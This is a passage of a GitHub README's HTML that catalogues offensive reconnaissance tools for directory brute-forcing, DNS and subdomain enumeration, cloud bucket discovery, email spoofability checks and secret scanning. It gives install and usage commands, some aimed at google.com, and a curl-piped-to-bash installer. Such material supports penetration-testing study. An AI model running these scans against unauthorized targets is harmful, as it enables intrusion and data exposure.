d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Nice tool for brute forcing file/folder paths on a victim website.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt install gobuster"><pre>sudo apt install gobuster</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="gobuster dir -u "https://google.com" -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20"><pre>gobuster dir -u <span class="pl-s"><span class="pl-pds">"</span>https://google.com<span class="pl-pds">"</span></span> -w /usr/share/wordlists/dirb/big.txt --wildcard -b 301,401,403,404,500 -t 20</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192146594-86f04a85-fce3-4c4c-bcd6-2bf6a6222241.png"><img src="https://user-images.githubusercontent.com/100603074/192146594-86f04a85-fce3-4c4c-bcd6-2bf6a6222241.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/epi052/feroxbuster">feroxbuster</a></h3><a id="user-content-feroxbuster" class="anchor" aria-label="Permalink: 
🔙feroxbuster" href="#feroxbuster"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A tool designed to perform Forced Browsing, an attack where the aim is to enumerate and access resources that are not referenced by the web application, but are still accessible by an attacker.</p> <p dir="auto">Feroxbuster uses brute force combined with a wordlist to search for unlinked content in target directories. 
These resources may store sensitive information about web applications and operational systems, such as source code, credentials, internal network addressing, etc...</p> <p dir="auto"><strong>Install: (Kali)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt update && sudo apt install -y feroxbuster"><pre>sudo apt update <span class="pl-k">&&</span> sudo apt install -y feroxbuster</pre></div> <p dir="auto"><strong>Install: (Mac)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh | bash"><pre>curl -sL https://raw.githubusercontent.com/epi052/feroxbuster/master/install-nix.sh <span class="pl-k">|</span> bash</pre></div> <p dir="auto"><strong>Install: (Windows)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip Expand-Archive .\feroxbuster.zip .\feroxbuster\feroxbuster.exe -V"><pre>Invoke-WebRequest https://github.com/epi052/feroxbuster/releases/latest/download/x86_64-windows-feroxbuster.exe.zip -OutFile feroxbuster.zip Expand-Archive .<span class="pl-cce">\f</span>eroxbuster.zip .<span class="pl-cce">\f</span>eroxbuster<span class="pl-cce">\f</span>eroxbuster.exe -V</pre></div> <p dir="auto">For full installation instructions see <a href="https://epi052.github.io/feroxbuster-docs/docs/installation/" rel="nofollow">here</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Add .pdf, .js, .html, .php, .txt, 
.json, and .docx to each url ./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx # Scan with headers ./feroxbuster -u http://127.1 -H Accept:application/json "Authorization: Bearer {token}" # Read URLs from stdin cat targets | ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js | fff -s 200 -o js-files # Proxy requests through burpsuite ./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080"><pre><span class="pl-c"><span class="pl-c">#</span> Add .pdf, .js, .html, .php, .txt, .json, and .docx to each url</span> ./feroxbuster -u http://127.1 -x pdf -x js,html -x php txt json,docx <span class="pl-c"><span class="pl-c">#</span> Scan with headers</span> ./feroxbuster -u http://127.1 -H Accept:application/json <span class="pl-s"><span class="pl-pds">"</span>Authorization: Bearer {token}<span class="pl-pds">"</span></span> <span class="pl-c"><span class="pl-c">#</span> Read URLs from stdin</span> cat targets <span class="pl-k">|</span> ./feroxbuster --stdin --silent -s 200 301 302 --redirects -x js <span class="pl-k">|</span> fff -s 200 -o js-files <span class="pl-c"><span class="pl-c">#</span> Proxy requests through burpsuite</span> ./feroxbuster -u http://127.1 --insecure --proxy http://127.0.0.1:8080</pre></div> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="Full usage examples can be found [here](https://epi052.github.io/feroxbuster-docs/docs/examples/)."><pre class="notranslate"><code>Full usage examples can be found [here](https://epi052.github.io/feroxbuster-docs/docs/examples/). 
</code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216729079-7a80f942-a692-4e91-8ffc-7d91d8d69d21.png"><img src="https://user-images.githubusercontent.com/100603074/216729079-7a80f942-a692-4e91-8ffc-7d91d8d69d21.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif" rel="nofollow">https://raw.githubusercontent.com/epi052/feroxbuster/main/img/demo.gif</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/0xsha/CloudBrute">CloudBrute</a></h3><a id="user-content-cloudbrute" class="anchor" aria-label="Permalink: 🔙CloudBrute" href="#cloudbrute"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A tool to find a company (target) infrastructure, files, and apps on the top cloud providers (Amazon, Google, Microsoft, DigitalOcean, Alibaba, Vultr, Linode).</p> <p dir="auto">Features:</p> <ul dir="auto"> <li>Cloud detection (IPINFO API and Source Code)</li> <li>Fast (concurrent)</li> <li>Cross Platform (windows, linux, mac)</li> <li>User-Agent Randomization</li> <li>Proxy Randomization (HTTP, Socks5)</li> </ul> <p 
dir="auto"><strong>Install:</strong></p> <p dir="auto">Download the latest <a href="https://github.com/0xsha/CloudBrute/releases">release</a> for your system and follow the usage.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt' CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w "./data/storage_small.txt" # Output results to file CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt"><pre><span class="pl-c"><span class="pl-c">#</span> Specified target, generate keywords based off 'target', 80 threads with a timeout of 10, wordlist 'storage_small.txt'</span> CloudBrute -d target.com -k target -m storage -t 80 -T 10 -w <span class="pl-s"><span class="pl-pds">"</span>./data/storage_small.txt<span class="pl-pds">"</span></span> <span class="pl-c"><span class="pl-c">#</span> Output results to file</span> CloudBrute -d target.com -k keyword -m storage -t 80 -T 10 -w -c amazon -o target_output.txt</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/216729172-5d58d005-85a8-49f2-8968-98b459961f81.png"><img src="https://user-images.githubusercontent.com/100603074/216729172-5d58d005-85a8-49f2-8968-98b459961f81.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/0xsha/CloudBrute">https://github.com/0xsha/CloudBrute</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://www.kali.org/tools/dnsrecon/#dnsrecon" rel="nofollow">dnsrecon</a></h3><a id="user-content-dnsrecon" class="anchor" aria-label="Permalink: 🔙dnsrecon" href="#dnsrecon"><svg 
class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">dnsrecon is a Python tool for enumerating DNS records (MX, SOA, NS, A, AAAA, SPF and TXT) and can provide a number of new associated victim hosts to pivot into from a single domain search.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="sudo apt install dnsrecon"><pre>sudo apt install dnsrecon</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="dnsrecon -d google.com"><pre>dnsrecon -d google.com</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/191689049-624db340-8adb-4a97-be8d-b7177f409a8b.png"><img src="https://user-images.githubusercontent.com/100603074/191689049-624db340-8adb-4a97-be8d-b7177f409a8b.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://www.shodan.io/dashboard" rel="nofollow">shodan.io</a></h3><a id="user-content-shodanio" class="anchor" aria-label="Permalink: 🔙shodan.io" href="#shodanio"><svg 
class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Shodan crawls public infrastructure and displays it in a searchable format. Using a company name, domain name, or IP address, it is possible to discover potentially vulnerable systems relating to your target via Shodan.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/191689282-70f99fe9-aa08-4cd3-b881-764eface8546.png"><img src="https://user-images.githubusercontent.com/100603074/191689282-70f99fe9-aa08-4cd3-b881-764eface8546.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/D3Ext/AORT">AORT</a></h3><a id="user-content-aort" class="anchor" aria-label="Permalink: 🔙AORT" href="#aort"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 
1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Tool for enumerating subdomains, enumerating DNS, WAF detection, WHOIS, port scan, wayback machine, email harvesting.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/D3Ext/AORT; cd AORT; pip3 install -r requirements.txt"><pre>git clone https://github.com/D3Ext/AORT<span class="pl-k">;</span> <span class="pl-c1">cd</span> AORT<span class="pl-k">;</span> pip3 install -r requirements.txt</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 AORT.py -d google.com"><pre><span class="pl-s1">python3</span> <span class="pl-c1">AORT</span>.<span class="pl-c1">py</span> <span class="pl-c1">-</span><span class="pl-s1">d</span> <span class="pl-s1">google</span>.<span class="pl-c1">com</span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/192070398-aae0217d-69c4-460b-ae4c-51b045551268.png"><img src="https://user-images.githubusercontent.com/100603074/192070398-aae0217d-69c4-460b-ae4c-51b045551268.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/BishopFox/spoofcheck">spoofcheck</a></h3><a id="user-content-spoofcheck" class="anchor" aria-label="Permalink: 🔙spoofcheck" href="#spoofcheck"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 
4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A program that checks if a domain can be spoofed from. The program checks SPF and DMARC records for weak configurations that allow spoofing. Additionally, it will alert if the domain has a DMARC configuration that sends mail or HTTP requests on failed SPF/DKIM emails.</p> <p dir="auto">Domains are spoofable if any of the following conditions are met:</p> <ul dir="auto"> <li>Lack of an SPF or DMARC record</li> <li>SPF record never specifies <code>~all</code> or <code>-all</code></li> <li>DMARC policy is set to <code>p=none</code> or is nonexistent</li> </ul> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/BishopFox/spoofcheck; cd spoofcheck; pip install -r requirements.txt"><pre>git clone https://github.com/BishopFox/spoofcheck<span class="pl-k">;</span> <span class="pl-c1">cd</span> spoofcheck<span class="pl-k">;</span> pip install -r requirements.txt</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="./spoofcheck.py [DOMAIN]"><pre>./spoofcheck.py [DOMAIN]</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208209744-dfff6dd6-f53c-41a2-b3b7-bfc6bfb9b521.png"><img 
src="https://user-images.githubusercontent.com/100603074/208209744-dfff6dd6-f53c-41a2-b3b7-bfc6bfb9b521.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/jordanpotti/AWSBucketDump">AWSBucketDump</a></h3><a id="user-content-awsbucketdump" class="anchor" aria-label="Permalink: 🔙AWSBucketDump" href="#awsbucketdump"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">AWSBucketDump is a tool to quickly enumerate AWS S3 buckets to look for interesting files. 
It's similar to a subdomain bruteforcer but is made specifically for S3 buckets and also has some extra features that allow you to grep for files, as well as download interesting files.</p> <p dir="auto"><strong>Install:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt"><pre class="notranslate"><code>git clone https://github.com/jordanpotti/AWSBucketDump; cd AWSBucketDump; pip install -r requirements.txt </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE] optional arguments: -h, --help show this help message and exit -D Download files. This requires significant diskspace -d If set to 1 or True, create directories for each host w/ results -t THREADS number of threads -l HOSTLIST -g GREPWORDS Provide a wordlist to grep for -m MAXSIZE Maximum file size to download. python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1"><pre class="notranslate"><code>usage: AWSBucketDump.py [-h] [-D] [-t THREADS] -l HOSTLIST [-g GREPWORDS] [-m MAXSIZE] optional arguments: -h, --help show this help message and exit -D Download files. This requires significant diskspace -d If set to 1 or True, create directories for each host w/ results -t THREADS number of threads -l HOSTLIST -g GREPWORDS Provide a wordlist to grep for -m MAXSIZE Maximum file size to download. 
python AWSBucketDump.py -l BucketNames.txt -g interesting_Keywords.txt -D -m 500000 -d 1 </code></pre></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/metac0rtex/GitHarvester">GitHarvester</a></h3><a id="user-content-githarvester" class="anchor" aria-label="Permalink: 🔙GitHarvester" href="#githarvester"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Nice tool for finding information from GitHub with regex, with the ability to search specific GitHub users and/or projects.</p> <p dir="auto"><strong>Install:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester"><pre class="notranslate"><code>git clone https://github.com/metac0rtex/GitHarvester; cd GitHarvester </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="./githarvester.py"><pre class="notranslate"><code>./githarvester.py </code></pre></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a 
href="https://github.com/dxa4481/truffleHog">truffleHog</a></h3><a id="user-content-trufflehog" class="anchor" aria-label="Permalink: 🔙truffleHog" href="#trufflehog"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">TruffleHog is a tool that scans git repositories and looks for high-entropy strings and patterns that may indicate the presence of secrets, such as passwords and API keys. 
With TruffleHog, you can quickly and easily find sensitive information that may have been accidentally committed and pushed to a repository.</p> <p dir="auto"><strong>Install (Binaries):</strong> <a href="https://github.com/trufflesecurity/trufflehog/releases">Link</a></p> <p dir="auto"><strong>Install (Go):</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install"><pre class="notranslate"><code>git clone https://github.com/trufflesecurity/trufflehog.git; cd trufflehog; go install </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="trufflehog https://github.com/trufflesecurity/test_keys"><pre class="notranslate"><code>trufflehog https://github.com/trufflesecurity/test_keys </code></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/208212273-137cb6ef-b0e6-42f7-8fd3-ac6a5cfe6a40.png"><img src="https://user-images.githubusercontent.com/100603074/208212273-137cb6ef-b0e6-42f7-8fd3-ac6a5cfe6a40.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/zhzyker/dismap">Dismap</a></h3><a id="user-content-dismap" class="anchor" aria-label="Permalink: 🔙Dismap" href="#dismap"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 
0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Dismap is an asset discovery and identification tool. It can quickly identify protocols and fingerprint information such as web/tcp/udp, locate asset types, and is suitable for internal and external networks.</p> <p dir="auto">Dismap has a complete fingerprint rule base, currently including tcp/udp/tls protocol fingerprints and 4500+ web fingerprint rules, which can identify favicon, body, header, etc.</p> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">Dismap is a binary file for Linux, MacOS, and Windows. Go to <a href="https://github.com/zhzyker/dismap/releases">Release</a> to download the corresponding version to run:</p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Linux or MacOS chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h # Windows dismap-0.3-windows-amd64.exe -h"><pre><span class="pl-c"><span class="pl-c">#</span> Linux or MacOS</span> chmod +x dismap-0.3-linux-amd64 ./dismap-0.3-linux-amd64 -h <span class="pl-c"><span class="pl-c">#</span> Windows</span> dismap-0.3-windows-amd64.exe -h</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Scan 192.168.1.1 subnet ./dismap -i 192.168.1.1/24 # Scan, output to result.txt and json output to result.json ./dismap -i 192.168.1.1/24 -o result.txt -j result.json # Scan, Not use ICMP/PING to detect surviving hosts, timeout 10 seconds ./dismap -i 192.168.1.1/24 --np --timeout 10 # Scan, Number of concurrent threads 1000 ./dismap -i 192.168.1.1/24 -t 1000"><pre><span class="pl-c"><span 
